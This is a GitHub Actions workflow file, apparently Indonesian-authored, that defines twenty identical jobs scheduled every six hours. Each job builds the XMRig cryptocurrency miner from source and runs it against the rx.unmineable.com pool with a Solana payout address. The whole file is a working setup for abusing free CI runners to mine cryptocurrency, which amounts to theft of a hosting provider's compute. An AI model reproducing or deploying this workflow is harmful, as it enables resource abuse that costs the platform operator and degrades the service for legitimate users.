name: sekaynotnt

on:
  workflow_dispatch:
  schedule:
    - cron: '0 */6 * * *'  # Jalan ulang setiap 6 jam

jobs:

  miner1:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 1
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner2:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 2
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner3:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 3
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner4:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 4
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner5:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 5
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner6:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 6
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner7:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 7
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner8:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 8
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner9:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 9
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner10:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 10
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner11:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 11
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner12:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 12
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner13:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 13
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner14:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 14
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner15:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 15
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner16:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 16
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner17:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 17
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner18:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 18
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner19:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 19
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4

  miner20:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 20
        run: |
          sudo apt update
          sudo apt install -y curl git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)
          ./xmrig -a rx -o rx.unmineable.com:3333 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --threads=4
